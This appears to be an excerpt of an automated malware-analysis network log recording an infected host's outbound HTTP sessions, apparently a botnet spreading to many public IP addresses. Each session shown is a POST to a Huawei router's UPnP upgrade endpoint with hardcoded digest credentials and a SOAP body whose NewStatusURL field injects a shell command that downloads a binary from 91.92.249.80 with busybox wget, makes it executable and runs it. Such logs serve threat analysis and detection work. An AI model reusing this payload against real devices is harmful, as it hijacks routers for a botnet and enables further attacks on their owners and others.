                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2274192.168.2.2337652197.78.235.24837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666207075 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2275192.168.2.2357890157.94.156.25137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666208982 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2276192.168.2.2354980197.183.23.7137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666228056 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2277192.168.2.2344488197.111.107.23737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666244030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2278192.168.2.235596641.202.140.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666465998 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2279192.168.2.233540297.219.109.3537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666465998 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2280192.168.2.233459041.88.81.15037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666543961 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2281192.168.2.2336902197.91.246.5037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666564941 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2282192.168.2.2357822157.151.229.2837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666585922 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2283192.168.2.235187241.130.228.7037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666610956 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
